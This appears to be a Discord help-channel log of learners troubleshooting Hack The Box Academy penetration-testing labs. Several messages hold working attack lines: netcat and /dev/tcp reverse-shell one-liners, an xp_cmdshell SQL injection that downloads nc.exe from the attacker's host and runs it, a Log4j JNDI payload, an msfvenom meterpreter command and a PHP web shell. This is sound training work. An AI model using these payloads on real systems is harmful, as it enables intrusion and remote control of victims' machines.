#modules

to get myself back to where i was.

Just visit in browser

404

¯_(ツ)_/¯

Are you on the right subdomain then?

oh i didnt realize that it was not on both. Ok thats a good sign. But the last two Qs talk about crawl the inlanefreight.htb domain.... do they mean

*.inlanefreight.htb
or
inlanefreight.htb/*

doesnt matter much but im not getting anything other than what i already have for both

maybe ferox buster is the move here

but i havent had any success with either uh ReconSpider, ffuf for content enum on either the sub or the domain so im not sure what another fuzz is gonna do

like nto even one result to let me know im on the right path

Both directions, if you cant find anything on your current subdomain. Dig deeper

And by dig deeper i mean: look for other subdomains

When you find a new subdomain, add it to the hosts file

Thank you for the advice. But ive used practically every subdomain list. I did find the one with admin, are you saying theres more than 1? Sorry if im asking to be spoonfed here.

Rinse and repeat

oh snap

sub of sub. i did evertything but that

holy kiss my grits batman

That won't have hidden admin

Btw

And a crawler won't find the hidden file, because robots says no

I see, thank you. I think I've "made the loop" but i dont have any content yet that i can tell certainly not anything with an email or additional api key

im gonna try reconspider again i guess

hello can someone help me on Documentation & Reporting - Skills Assessment
i have 3 hosts and got root on 2 of them but i can't even ping DC
nvm, reset the lab and dc ip pop-up

Hi everyone, could someone help me with understanding something? I'm on the Logrotate section of Linux Privilege Escalation and I'm a little confused. I get the concept of using Logrotten to run a payload when it rotates a log file, but I dont understand a couple things.

1. how do we know that Logrotate manages the .log files wtihin the /backups folder
2. how do we know what mode logrotate is using for those log files
3. how do we know we need to enter text inside the log file to force it to rotate?

And also how do we know that the flag is located in /root/flag.txt when we cant look inside /root?

Is there maintenance on the labs ?
The machine's disaperers and comes back ???

seeing same as you hklm, like RDP sessions refreshing every couple minutes

Yup that is what I see 🙁 was very stable the last 2 weeks 🙂 🙂 🙂 but this evening 🙁

103 packets transmitted, 43 received, 58.2524% packet loss, time 103499ms

could anyone point me in the right direction? I am trying to coerce from Target to my box, Target has webdav on, I got responder up on my box, but when I use Coercer with coerce it says [!] (NO_AUTH_RECEIVED) (it's from NTLM Relay Attacks)

@hazy brook Please do not post content from modules above tier 0, especially skill assessments

🫤 I thought it was quite censored, sorry

I will never understand why if the purpose of the platform is to learn, doubts cannot be shared.

Anyway, that's fine too

Doubts can be shared, but exposing stuff like usernames/passwords and techniques (especially for skill assessments) just creates shortcuts for people that are lazy

https://tenor.com/view/crycat-crying-cat-crying-cat-thumbs-up-thumbs-up-ok-gif-22851318

Can I possibly get some assistance for the Unit Active Directory Enumeration & Attacks? The Section is Internal Password Spraying - from Linux & the question is: Find the user account starting with the letter "s" that has the password Welcome1. Submit the username as your answer. So far I have made the username list via using kerbrute & when running this command (kerbrute passwordspray -d inlanefreight.local --dc 172.16.5.5 found_usernames.txt Welcome1) I do not get any found usernames starting with 's'. I tried restarting the ip address via hackthebox and it also gave me the same issue as before.

So you are connecting to the provided attack box via SSH, executing the attack from an internally connected host, and it is failing or running and just not finding the user?

Yes I am attacking from the internally connected host. It is running but it is just not finding the user

You can DM what you got.

👍

DM me if still stuck

Windows Privilege Escalation - Kernel Exploits CVE-2020-0668 Example

I was trying to get net start MozillaMaintenance to work in the RDP machine which resulted in The program or feature "\??\C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe" cannot start or run due to incompatibility with 64-bit versions of Windows. Please contact the software vendor to ask if a 64-bit Windows compatible version is available.

Module: Pivoting & Tunneling
Section: Meterpreter Tunneling & Port Forwarding
I'm working on the exercise of this section, and I'm doing everything according to the module
I'm trying to setup a socks proxy with metasploit, and I see the exact same output as shown in the module, yet when I perform the nmap scan with proxychains I get filtered instead of open for port 3389 on host 172.16.5.19 (obtained by the ping sweep).

Did anyone have the same issue?

I tried both SOCKS5 and SOCKS4 and the results are still the same

Hi
In attacking common services easy lab
I got a reverse Shell with powershell base64 in my kali
But i cant execute any command

I dont know why, i know if You have a Linux You can get a interactive Shell
In Windows powershell can i do the same?

your question doesn't really shows what kind of problem you're having

I used this command to spin up maintenenceservice.exe:

msfvenom -p windows/x64/meterpreter/reverse_https LHOST=localport LPORT=notpythonport -f exe > maintenanceservice.exe

Anyone doing the new module attacking AI application and systems yet

Need some help 🙂

Once you get cve-2019-10945 working it will show you the filename of the flag. Because this is in webroot you can just curl the vHost and the filename of the flag. The return is the contents of the flag.

I broke things and still confused about how to get this deprecated cryptographic to work
thi is for https://academy.hackthebox.com/module/147/section/1335

tried these but nothing worked
https://github.com/ThePorgs/Exegol-images/issues/367
https://github.com/fortra/impacket/issues/1716
even booting up the HTB PWNBOX but that is more broken than my system

[*] GOT CERTIFICATE! ID 13
Exception in thread Thread-6:
Traceback (most recent call last):
File "/usr/lib/python3.13/threading.py", line 1043, in _bootstrap_inner
self.run()
~~~~~~~~^^
File "/usr/lib/python3/dist-packages/impacket/examples/ntlmrelayx/attacks/httpattack.py", line 42, in run
ADCSAttack._run(self)
~~~~~~~~~~~~~~~^^^^^^
File "/usr/lib/python3/dist-packages/impacket/examples/ntlmrelayx/attacks/httpattacks/adcsattack.py", line 81, in _run
certificate_store = self.generate_pfx(key, certificate)
File "/usr/lib/python3/dist-packages/impacket/examples/ntlmrelayx/attacks/httpattacks/adcsattack.py", line 113, in generate_pfx
p12 = crypto.PKCS12()
^^^^^^^^^^^^^
File "/usr/lib/python3/dist-packages/cryptography/utils.py", line 68, in getattr
obj = getattr(self._module, attr)
AttributeError: module 'OpenSSL.crypto' has no attribute 'PKCS12'

Hello guys, how come when i am AS-REP Roast, when i get the hash with kerbrute i can't crack it, but when i get the hash with GetNPUsers.py I can crack it....

Doesn't make sense to me

Kerbrute command:
kerbrute userenum -d htb.local --dc 10.10.10.161 /tmp/forest/users.txt

GetNPUsers.py command:
for user in $(cat /tmp/forest/users.txt); do python3.11 GetNPUsers.py -no-pass -dc-ip 10.10.10.161 htb/${user} | grep -v Impacket; done

Anyone know if JuicyPotato is intentionally not meant to work on the target @ Windows Privilege Escalation Section: SeImpersonate and SeAssignPrimaryToken

I can't reveal much more than that without spoiling module content... so DM if you know 🙂

It does work, your command is probably not correct

may I DM you to check my cmd please? edit: resolved, thank you Nathan

why does going xxx.inlanefreight.local and IP on firefox bring me to different pages?
am i not essentially querying the same IP?

the subdomain is mapped to a different webroot

That's a vhost.

Perhaps some formatting issues in Kerbrute's output hash. Personally, I've never faced such an issue before.

Try nxc, it does a good job too.

thanks

I just completed introduction to active directory along the guided labs, the labs were fun

Where should i go next from here?

its from which section ?

i doing Attacking the OS section , not reached there .

Hi everyone

Attacking Common Applications - Skills Assessment III

what to do now ? idk reverse engineering much

could someone please help me with this sections it been pure pain for the password attack module everything was fine until legit this section couldnt configure my kali so grabbed a VM of a older version of Kali and now have this as my "Base64 Certification of user DC01$:"
https://academy.hackthebox.com/module/147/section/1335
MIIRrQIBAzCCEWcGCSqGSIb3DQEHAaCCEVgEghFUMIIRUDCCB4cGCSqGSIb3DQEHBqCCB3gwggd0AgEAMIIHbQYJKoZIhvcNAQcBMBwGCiqGSIb3DQEMAQMwDgQIM1KQZyxrR4UCAggAgIIHQJtMltjXBgqx9qmKav8Lng1nnyhiMH9/968l8YT2Kuo+910b5UyKgXPcuoK8vp3ZpLImysz1KwpQIpN/ihKlBmudOuiPXuf3tI6zNMvbQMDXS/5EVNJJhyoxORJNzxpU/Fz60FEBDRtT4upIoAUoFms7OuwLym/L0aBV2l9qiNXvk0MdsDXibkNpWM7ky8KWv0TgEp8nNZnOPWNdT/te5IgCOZ73HWnB9Obbkc59YeFLIvzqZpVk8Q1GUlBptJebPy4fTfgjVQ1Xh82posbGzkyZLMmGQHbYhA9qHRLxSF5uUyS6RemUc/aeB9JC4hR/k7/oqNwpxjkPtj42bbLi/PGSC1T7cFDiZf98ZeM8YjXNqGI0HKBGUnCOjdsf6koBM3mCp3MxB8NcqKn0yfu0foTPJUCTvucK44Ml19seBJNyV5Cc0FpLkiK8I+9yg1lWlbQmS2PWdZV9A5DrMkzbT6W0QHJgOwl+OPvyimKHpxFKTwRScAnOlds44RmHZHp+gtSJERt+QTJVGX/Y7NrnbE8LDDZuEZLmuWYqiM+OCBRRRvmO6Xa0MWB1byd0qGkglQ4kQ2lAbi/ etc etc

1-https://academy.hackthebox.com/module/details/158
2-https://academy.hackthebox.com/module/details/143

Easiest thing to do is to just use that cert with netexec

└─$ nxc smb -h 
<SNIP>
--pfx-base64 PFXB64   Use certificate authentication from pfx file encoded in base64```

huh this wasnt on the material but if this work r1cky you have saved me legit been on this for a few weeks now...

of course this old kali doesnt have netexec hahahaha

You're right it wasn't in the material, so I guess it is a little extra for your notes.

where did you find this info prior knowledge or just searching how to authenticate with pfxb64 files?

very curious how fast you came to hit me information hahahaha

I like to learn as much as I can about the tools I choose to use. A course can only teach/show you so much, which should be the element to drive your curiosity and desire to learn more on your own.

true perhaps I need to expand my knowledge more on your comment, I am curious although it tends to result in broken VMs hahahaha

Nothing a snapshot can't fix

ive had bad experiences with snapshots hahaha

although could try again since its at my own home

Hello

So yeah anyways, use the labs as an opportunity to explore tools and different ways to perform the same thing. The 2 is 1 and 1 is none mantra should always be used, otherwise that one tool you rely on becomes a single point of failure when it doesn't work.

very true just like a failure domain with switches and routers xD
cheers r1cky might have to start looking at those retired lab boxes

is anyone having issues with the NTLM Relay Attacks module too? I literally respawn the lab non stop and .60 will not turn on...

https://academy.hackthebox.com/module/147/section/1335 Can someone help me with this section I got certicate but

And why I got 2 ips in the task where I shoul put them

I am still stuck. Appreciate any hints or pointers. Thank you.

Hi guys, I'm in this /module/69/section/2083 few days ago, someone can help me with this question - Find the percentage of users with a path to GLOBAL ADMINISTRATOR. Submit the number as your answer (to two decimal points, i.e., 11.78).

Can someone say me for what purpose I need second IP

One IP is the Domain Controller (DC) and the other is the Certificate Authority (CA).

This is from the Bloodhound module?

You need to find something that isn't the DC, as it might contain information that can help you understand the environment.

Which section?

NTLM Relay Attacks targeting kerberos, after 3 or 4 restarts .60 finally booted

I opened a ticket anyway (got a little frustrated because I am time-constrained and waiting 3-5 minutes for each restart makes it tough)

MeshCentral?

So if you got Q1, take some time to enumerate that host.

yes it's that

Are you still stuck?

YES it's the last question for finish this module and i found 13 users 3 have quick acces for admin for me it's 23.08% but i did something wrong the answers it's not accepted

DCOM?

Yeah, go ahead and DM.

Module: Linux Fundamentals
Section: File System Management
If you have to kill open files before unplugging a storage device in this case a USB drive, to prevent corruption or wtv.
Why does he use 'lsof ~ grep cry0l1t3', wouldn't you use something that targets the USB instead? Sorry if my question comes across as naive.

It's not a guessing game. Simple host-based enumeration.

10.129.142.56 DC01.INLANEFREIGHT.LOCAL DC01
``` here my /etc/hosts

Please refrain from posting content from modules above Tier 0.

I just want to understand why I always get this error, I tried to reboot targets so many times, and it didn`t work

You can DM.

Just use ip a | grep "1500"

Or just use ip a and look for a 1500.

Dmed you

Replace the tilde "~" with the pipe sign I don't have on my keyboard.

|

May I DM you?

Sure

Lmk if it worked?

Did anyone complete the esc11 lab in Adcs attacks module? facing some issues

tried ways to dump local administrator ntlm hash on ws01 but no luck till now

i am going through a problem in module password attack sub module pass the certificate a certificate was issued for DC01$ it is not issueing the certificate i have tried the given command for my PTCDC01 and PTCCA01 for printerbug.py and viseversa i know what to do but it is not working for me please guide me someone

@soft moon may i gain some insight i pinged because you and i am in same submodule??

Im as lost as you are sadly

taking a break and doing some retired boxes tomorrow just overworked myself today

I'm working the nessus assessment and im curious if i need to install nessus... i see a service listed here but i get an error trying to start it.

https://academy.hackthebox.com/module/108/section/1233

i guess me too rest here since i cannot gain a TGT as DC01$ initail part for PTC

You can DM what you are trying.

No you should not have to install Nessus.

okay, thank you.

Module: Attacking Common Applications
Lesson: Attacking Thick Client Applications

After I disable the permissions on the users, and run ./restart-oracleservice.exe the files aren't created. Can I get a nudge, I'm very lost lol

not seeing an icon on the desktop anywhere or in the menu. see it listed in dpkg but cant call it? any advise how to kick this thing over?

maybe i need to enable then start?

Are you on the skills assessment?

yes

Do i need to run it from inside the 10.x.x.x box?

run it when ssh'd in to 10.x.x.x*

It should be accessible at https://10.129.xxx.xxx:8834

you can access nessus via web

it's already running on the server

thanks that wasnt apparent. i saw the reminder but it only mentioned how to access not that it was already running

Chats a lull, @fathom pendant unrelated to the module, do you find the nessus html (or other) report output to be less than useful for our purposes? I can see this being helpful for at a glance stuff for like non-technical reviewers or something but the fact it will output an html doc that doesnt have the stuff the full report in the service has... seems less than helpful. Is that what the nessus db export thing is for?

Automated tooling only goes so far

I find it in the same vein as winpeas or linpeas or any of those tools

All the stuff you need is in the web dashboard but i thought the report would be more helpful than just a CVSS score, a link to details and the description of the identified issue or whatever.

Ok i see what you're saying and agree.

Sorry everyone, does anyone know why the windows rdp keeps disconnecting even when I connect via pawn machine

thats sorta "normal" in my experience.

i think some people say to connect with udp or something? i dunno i just struggle thru it and get it over with

Tcp

Password attacks --> Credential Hunting in Network Shares. I'm stuck at this question: One of the shares mendres has access to contains valid credentials of another domain user. What is their password?

I tried to search for the following keywords "pass", "INLANEFREIGHT\" via man spider but none of the discovered passwords is the answer. Any idea on where I'm going wrong? Thanks

what happened

spider will not work

you have to manually try that...manually hunt for that file

netexec will throw you an error

and why is that? You're supposed to apply what you studied above in the module

yeah...because of some reason ..i dont know the reason..its maybe lab issue..its throws error...but you can dm me for further info

I have progressed using a py file thank you for asking and on nthash part right now

connection issue maybe?

ohkk np

looks like you can't receive my dms

i can

Hmm okay thanks

try again

nvm. It worked fine from the pwnbox 😒

Is there some kind of maintenance on the labs because I am loosing my RDP connection every minute or so 🙁

Or is there something I can do ?

Are you using the VPN at the same time as the pwnbox?

No I only use the vpn.

try servers or regions

I will
Is UDP or TCP more stable ?

TCP

https://academy.hackthebox.com/module/24/section/514

Question about whats being asked in the question #1

`Download the file flag.txt from the web root using python FROM the pwnbox. submit contents'

Does it want me to setup a python http.server (or similar) on pwnbox then upload it from the target?

or Download the file from the target where a python server is setup?

or use python to issue a get request? this is a strange way to word the question

(i understand the module, im just trying to stay as close to the "rules" as possible here)

I dont believe a "download with python" was mentioned in the sections. theres an "upload a file with python"

Im not gonna get too hung up on how, i've done it both ways by following the modules its just an odd wording. Thank you

i'm Windows Privilege Escalation > Citrix Breakout . The citrix environment is so slow. I tried a different vpn but same experience, Is this normal?

Some environments are slow, super slow

Try changing servers or regions. I've seen this help a lot.

Hello everybody I can't wait HOLMES competition

Hello guys, i cant really seem to able to type in any other channels, I am new to this channel but not new to cybersecurity, i know some concepts but they are very shallow and basic. I have been trying to figure it all out but it is very messy and i dont have a clear path. Is there anyone who can be my mentor please.

Anyone around for the Pivot Tunneling and Port forwarding module? I'm stuck on the last 2 questions on the skill assessment I have the user but no creds

Getting Started Module: I've had this issue for Nibbles and also the Knowledge Check after Nibbles: Essentially I get to the point where I'm trying to pop a shell and I can get it to do php commands such as whoami but no matter what reverse shell I try, I can't pick up packets. I'm routing it to the tun0 from the vpn but still

replace the example command where it uses /dev/tcp/ip/port with your ip/port that you're using

i.e. /dev/tcp/10.10.14.1/7777

i found i could ||edit the theme file||

so figured that was an option in

you can see the www-data from the whoami but my "nc -lvnp 4444" isnt picking anything up

@rugged star try not to spoil skill assessments (knowledge checks)

o my b

try using the full filepath of the binary /bin/bash

also your revshell is missing a whole bunch of stuff

review the "nibbles - Initial foothold" section again

also you may want to incorporate using the "/bin/bash -c 'the other command here'" to ensure that you're running it all in bash

also make sure you're running your listener before you call the webpage to have it call back to you

check, and also ||system("/bin/bash -c "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc IP_HERE PORT_HERE >/tmp/f"");|| this is my command now

still dont see anything in my shell after it says "listening on 4444"

Found your problem

You mixed your quotes

"/bin/bash -c" [some middle bit]""

Use single quotes to wrap the secondary command

Did you perform post exploitation on previous hosts? This should help to harvest creds.

did you mean like ||system("/bin/bash -c 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc IP_HERE PORT_HERE >/tmp/f'");||

Yes

There's a syntax error in that command because you've got 2 sets of double quotes. Nested quotes need to be either escaped (\"\") or single instead of double.

didnt get anything..

if it helps im not on the parrot vm im on arch im new to this universe so not sure what could affect what. I'm also using a different local shell called fish but dont think that matters

that makes sense

hello everbody i have a problem with exploiting the log4 vulnerability i create the pay load

• java -jar ~/Apps/ysoserial-modified/target/ysoserial-modified.jar CommonsCollections5 bash 'bash -i >& /dev/tcp/10.10.16.24/9001 0>&1' > cc5.ser
• then run the java -jar JNDI-Exploit-Kit-1.0-SNAPSHOT-all.jar -L 10.10.16.24:1389 -P cc5.ser
• have the nc -nvlp 9001 running and insert in tomcat but he give me always this ERROR BACK and i tried everypayload from JNDI EXPLOIT KIT
• 2025-08-20 23:49:48 [LDAPSERVER] >> Send LDAP reference result for jkgzsw redirecting to http://10.10.16.24:8180/ExecTemplateJDK6.class
  2025-08-20 23:54:12 [LDAPSERVER] >> Send LDAP reference result for 9qlr0e redirecting to http://10.10.16.24:8180/ExecTemplateJDK8.class

yea im not sure. Im confused why I cant get this to work since the "whoami" is working and im using the recommended command from the nibbles - initial foothold. this machine isnt blocking any commands or has a firewall right? i mean its in the getting started module

pretty sure i also confirmed that i can receive packets from it, cant remember how i did that but specifically reverse shell isnt working

Not sure if they are on pwnbox. I used my VM and brought them over.

how did you compile the pwn.c

no, they aren't on the pwnbox. Generally speaking, I just pillaged all the stuff from the relevant C:/Tools/ files on the AD enum module and win priv sections

i would appreciate a little help

Which module is this from?

@cedar mural Please don't reveal content from modules above tier 0

My bad, didn't realize I was revealing much

is from a box logforge

i think i am the wrong chat

im still looking for any ideas on this if anyone can think of anything

omg i did it i found a firewall on my machine lets go finally

Yeah, best to ask in #boxes

Hey everyone, I'm stuck on a Blind SQLi to RCE problem and would appreciate a nudge in the right direction.

I'm using xp_cmdshell to get remote code execution. My PowerShell payload successfully downloads nc.exe from my machine to the target's c:\windows\tasks\ directory—I can see the GET request on my local web server.

However, the second part of the command, which should execute nc.exe to start a reverse shell, doesn't seem to work. I'm not getting a connection back on my netcat listener.

Here is the decoded PowerShell command I'm trying to execute:

(new-object net.webclient).downloadfile("http://10.10.16.4:8000/nc.exe", "c:\windows\tasks\nc.exe"); c:\windows\tasks\nc.exe -nv 10.10.16.4 1337 -e c:\windows\system32\cmd.exe;

And here's the full SQL injection payload I'm using (URL decoded for clarity):

'; exec xp_cmdshell 'powershell -exec bypass -enc <BASE64_PAYLOAD>'-- -

I've confirmed my listener is up on port 1337. Any ideas why the nc.exe execution might be failing? Perhaps an issue with permissions, antivirus, or firewall rules? Any tips for debugging this would be a huge help! Thanks.

i think this question might have to be uppdated

The answer i get when i get the banner in the box is ******_9.2p1 ******* but the correct answer is ********_8.2p1 ****** when i reveal the answer.

#1234357888114364508 is the place to post about module corrections

tnx did not know

it also helps to provide the module and section name so others can sanity check you

was just going to do that

tells me that i cant post there, that i need a "tagg"

select one of the tags when creating the post

oh my bad

it's ok. discord doesn't make things intuitive sometimes

Done 👍

can anyone help? in question Submit the Administrator's flag from C:\Users\Administrator\Desktop from Windows Privilege Escalation > Citrix Breakout, i start the smbserver but when i go to paint within the citrix environment and put in the UNC \kali_ip\share, it doesn't connect

Have you received an answer to this? I have the same issue.

Have you received an answer to this? I have the same issue

I have the same issue 🙄

Write the literal word PORT

Pls help ;-;

pls advise

Can anyone please help to get ligolo client working on a windows target ?

For context -- chisel did not work on this target either

Is that a firewall problem

which module section and question is this about

your error says the machine is actively refusing connections on that port, so some kind of network issue/not running the right syntax/wrong port/not privileged since it's port 443 etc

Che the Port of the proxy
For default is 11601

Check*

@eternal crystal may i ask for your guidance since i am in the same module?

i was working on the info sec foundations pathway a few months ago and stopped cause of school and work -- since then i have used the material roughly enough to be able to glance over my notes and understand what was happening quickly. im getting back into it with the summer ending and am wondering if its worth reviewing all my notes from this pathway or just finishing it off and building off what i currently have while pursuing pentest path

i feel like if i have any questions or info gaps i can just fill in or google whats necessary rather than spending all that time redoing modules

My monitor just broke guess no more coding for me for a while ❌️🥲

Please keep the spoilers to a minimum @eternal crystal - take it to dm with them as this is not a tier 0 module 🙂

Also removed your question as you were showing partial solutions 😉

i did mark them as spoilers and didn't reveal anything specific, can you please explain how am I supposed to ask for help without giving too much info then?

sorry for that, new to the server

Marking something as a spoiler isn't enough 🙂 You could say "I am stuck on module X section Y, can someone help?"

no problem 😉

i am stuck on the skill assessment of password attacks module after the initial foothold. can somebody who has done the updated module help me over the DMs? ty

you can dm me if you want @eternal crystal 🙂 tell me what you've got and I'll try to help

Hello everyone. I'm currently doing the cjca path . I'm stuck in introduction to bash scripting module. In the flow control loops section. Can someone help plz

Hello, everyone. I’m working on the module Attacking Common Services - Easy. I found a user via ||smtp-user-enum|| and attempted password spraying on FTP, but it didn’t work. Any advice would be appreciated.

I also ran ||Gobusterto brute-force subdomains||. When I checked http://<ip>, I only saw a message saying ||'allow file upload'||, but I can’t figure out where the upload point actually is.

I attempted hydra mysql,but still failed

on the Filtering contents lesson, the final question is to find the number of sub-directories of the url https://www.inlanefreight[.]com using cURL. how does one solve that?

Thanks

Hi, is there a way to reset an academy module, at least the answers I have provided?

there is option to retake modules..but i never tried that dont knw what it does

dm me if you still need help

I tried that, It just brings you to the beginning of the module

Doesn't reset the progress

Thanks anyways though

@eternal crystal for that i reccomend everyone to compelte pivoting modle first..it clarifies most of the quesitons and problem one should face...becauuse socks proxy dual pivot all that stuuff

even if you know answer then try to get to that answer....now the diff is you dont have to submit it..you just know that you got the flag

that's what you can do

Yep I will do that

I just didn't want to give myself hints

hahaha

for which modules you are trying that?

Almost the entirety of the defensive modules I unlocked xd

ohh ohkk

You in the right way continue enumeration look at port of ftp

Hello all, I'm stuck at API attacks BOLA section, if tried using the for loop and manually but i get 404 not found.

In the path /api/v1/supplier/quarterly-reports/[id]

Wordpress - Skills Assessment

I'm stuck on this question for a while.. i think i am not getting the question in real sense.
Can anyone have hint about this?

Hello, im stuck on the Wi-Fi Penetration Testing Basics in the aigraph-ng part, i created a png graph, but i definitely not know how to show the graph/open the image,

heyo, use a common tool to get the vulnerable plugins.

Make sure you are using the supplied credentials. Could also fuzz this with Burp or with another fuzzing tool.

Yes i logged in using the supplied credentials then copied the jwt

Then used the given script changed the IP,port and path still no response

Used my token too

I didn't try the script, I just used Burp, so I cannot say if there is an issue with script or not. If one thing fails and continues to fail after troubleshooting, maybe it's time to try something else then circle back to the original later.

Let me capture the request in burp and fuzz the IDs.

If you still get 404s, I'd reset the target and if it persists, try switching VPN regions, etc.

what do u mean?

Hello, does anyone know how to use responder over ligolo pivot tunnel?

Any ideas?

@gray yacht can you guide where i am making mistake?

the question is telling you to find a vulnerable plugin, after that read what the vulnerability does and how you can use it to answer your question.

👆 read above

i have founded LFI Vulnerability but can't figure out which file should i have to open

Hi all, i have a question. I m currently doing the "PRTG Network Monitor" module, but i can not obtain the reverse shell through the param execution via web GUI. I have used all the powershell reverse shells like for e.g. 'Power Shell #2' of 'https://www.revshells.com/' , but nothing works. I tried also the IEX technique, using a python server on my kali, i received the GET request from the target OS, but nothing on the nc listener. Can someone help me figure it out?

I had to remove the link it was a spoiler 😅 . Look at the exploit, the answer is there.

i didn't even got the link

damn i got that man, thanks

i learn i have not to rely on output, must have to enumerate further manually

Would anyone be willing to help me with Burpsuite/Zaproxy? I am trying to bypass whitelist filter and I can't seem to do it.

What’s the issue

On Zap I always get file successfully uploaded. On Burp I always receive Only images are allowed.

In the response

Hey, im stuck on the Airdecap part in the wifi penetration basics module, i have a pcap file, but how can i read it? im in cli so wireshark cannot open it ?

morning! i am only on the setup module or stage on HTB, experimenting with Wave, how do i create a bashrc file as i do not have one and am stuck on this

no sorry its a -dec.cap

Why can't you open/read it, is Wireshark not installed?

I'm on SSH on the machine, so i have only CLI, maybe im doing something bad idk?

ssh from the pwnbox

Pretty sure that section gives you credentials to RDP into a host or am I looking at a different one?

yes but for rdp i do something like ssh wifi@ip

its not the good way?

2 different protocols/services. I would use the creds to RDP as it suggests.

and how do i rdp from the pwnbox please?

Can look for xfreerdp, rdesktop, remmina as they can all provide you with a means to RDP. It's highly likely that you can use xfreerdp with pwnbox. I do not use pwnbox, so I cannot say for certain which is on it.

What’s the question

Burp/Zap don't show me when files actually bypass or maybe I am misunderstanding. I am able to upload the file but when I access it I get a 404 or that the file has errors.

ok workin thx

DM me please

can i dm u?

yeah sure.

https://academy.hackthebox.com/module/136/section/1290
||curl 'ip:port/profile_images/shell.phar.jpg?cmd=id'||
||GIF8 <?php system($_REQUEST['cmd']); ?>||
Why don't I get the cmd output?

u uploaded this
GIF8 <?php system($_REQUEST['cmd']); ?>

I uploaded the file with that as the content

dm me

done

guys, I'm having a problem with API Attacks -> broken authentication, I'm resetting the otp from email-otp end point of main MasonJenkins@ymail.com after resetting going to reset end point and capturing the request in burp, using intruder im fuzzing from 0000-9999 but all i receive is SuccessStatus:FALSE

what am i doing wrong

on all respones successstatus is false

now what should i do

Go ahead and DM what you are trying.

oh im sorry, didnt know that, could you explain what i might be missing?

https://academy.hackthebox.com/module/115/section/1205

i'm trying to do the msfvenom payload creation on a windows machine because it was the box used in the last section and this section only covers linux.

once i have the exe output, can i ... its a binary... i cant just cat its base64 encoding and copy paste right? these scenarios assume we have a way to deliver the exploti t to the target machine?

nvm this is mentioned in the section, you DO need a way t odeliver it

https://academy.hackthebox.com/module/147/section/1335

Ive managed to get the TGT ticket for the machine account, but I’m unable to dump the Administrator hash using either -just-dc-user or -use-vss. Could anyone explain what i might be missing?

You can DM what you are trying.

hey so im run this to confirm a password change: proxychains crackmapexec smb 172.16.8.3 -u xxxxx -p xxxx

but im only getting: [proxychains] config file found: /etc/proxychains.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4

my proxychains.conf is as follows. Why am i not getting a confirmation?

Try to run the command with sudo

ok with sudo now im getting this

hello everyone i am trying the Intro to Academy's Purple Module Page 6Usage Example: JetBrains TeamCity CVE-2023-42793 the Enabling Debug Mode for RCE and when i use it it shows this curl -H "Authorization: Bearer eyJ0eXAiOiAiVENWMiJ9.dWRYeEc2dFM3X2VuRV9yZTJCbFpOcUloNWVV.Y2M0ODIzZGEtMTUyNy00NmY3LThiNzgtM2E0M2YzMmY0YjQ4" -X POST "http://10.129.76.28/admin/dataDir.html?action=edit&fileName=config%2Finternal.properties&content=rest.debug.processes.enable=true"
Could not authenticate with provided token
To login manually go to "/login.html" page am i doing something wrong

Hi to everyone, I have a problem to find the proper wordlist for this question:

What is the API key in the hidden admin directory that you have discovered on the target system?

I have already used "subdomains-top1million-110000.txt"

Module: Information Gathering - Web Edition
Content: Skills Assessment

I got it, my ssh session didnt have -D 8081

aye greetings yall, I'm having trouble with the file uploading module, type filters https://academy.hackthebox.com/module/136/section/1290; I found what extensions are allowed and the content types, but I can't seem to be able to upload anything, I always get only images are allowed. the wordlist I use is generated with

#!/bin/bash

for char in '' "%20" "%0a" "%00" "%0d0a" "/" '.' "." "…" ":"; do
for ext in $(cat allowed_ext); do
echo shell$char$ext.jpg >> wordlist.txt
echo shell$ext$char.jpg >> wordlist.txt
echo shell.jpg$char$ext >> wordlist.txt
echo shell.jpg$ext$char >> wordlist.txt
done
done

Re-read the section. It doesn't say anything about the extension, the whole section is about the content type and mime type.

@little belfry This isn't the channel or server for something like that.

the hint says to use a whitelist bypass technique to bypass both extensions checks, i'm not sure what you are refferring to ?

The section you linked is for bypassing types (mime, content.) Have you tried the techniques taught in the section? You should focus on those.

yes, I've tried pretty much everything for the last couple hours 🙁

Something that helped me was getting an actual image file (jpg, gif, whatever), uploading that through a web proxy, and modifying the request by deleting the data (sans the file signature) and inserting the web shell payload.

hmm, just how much of the magic should I leave there? I've tried with the following magics

GIF8
GIF87a
GIF89a
PNG
����JFIF��C

and with the following content-types

image/png
image/gif
image/jpeg

I used this https://en.wikipedia.org/wiki/List_of_file_signatures

Get a real picture to upload and work your way forward from there, replace and test one thing at a time to see what exactly is blocking it

from the looks of it it just gets blocked because of the content of the 'picture'. I have the same image uploaded with multiple content types / magics, but when I try to put the shell in there i get the error of "only images are allowed"

well it might just have been me deleting the ending of the packet with zap (at the end there is a large number that was getting deleted along with the content of the photo ... took bout 4/5 hours to realize that 💀 )

god damnit man, it really was the random way zap ends packets 💀

Windows Privilege Escalation Further Credential Theft

I am not able to run the xfreerdp /v:targetIP /u:jordan /p:HTB_@academy_j0rdan! command for the first question

[15:08:43:635] [6187:6188] [WARN][com.freerdp.crypto] - Certificate verification failure 'self-signed certificate (18)' at stack position 0
[15:08:43:635] [6187:6188] [WARN][com.freerdp.crypto] - CN = WINLPE-SRV01
[15:08:43:836] [6187:6188] [WARN][com.freerdp.core.nla] - SPNEGO received NTSTATUS: STATUS_LOGON_FAILURE [0xC000006D] from server
[15:08:43:836] [6187:6188] [ERROR][com.freerdp.core] - nla_recv_pdu:freerdp_set_last_error_ex ERRCONNECT_LOGON_FAILURE [0x00020014]
[15:08:43:836] [6187:6188] [ERROR][com.freerdp.core.rdp] - rdp_recv_callback: CONNECTION_STATE_NLA - nla_recv_pdu() fail
[15:08:43:836] [6187:6188] [ERROR][com.freerdp.core.transport] - transport_check_fds: transport->ReceiveCallback() - -1

try wrapping the password in quotes

https://academy.hackthebox.com/module/315/section/3771 (Attacking AI - Application and System, Model Deployment Tampering)

I'm having some trouble with last step. For some reason I'm getting a YAML parsing error in JSON response.

{
  "code": 500,
  "type": "InvalidWorkflowException",
  "message": "Failed to parse yaml."
}

Also, I don't see last RCE request. It seems like MyScriptEngineFactory.class is actually getting downloaded properly (200 code), but never executed. I'm not totally sure that provided YAML is enough to succesfully exploit the service. Maybe someone had the same issue?

Same result

did you wait 5 min after spawning the target?

When I rebooted the box/target no but I let it run for an hour prior to reboot.

idk should be working maybe try remmina or something else to see. double check network connections etc

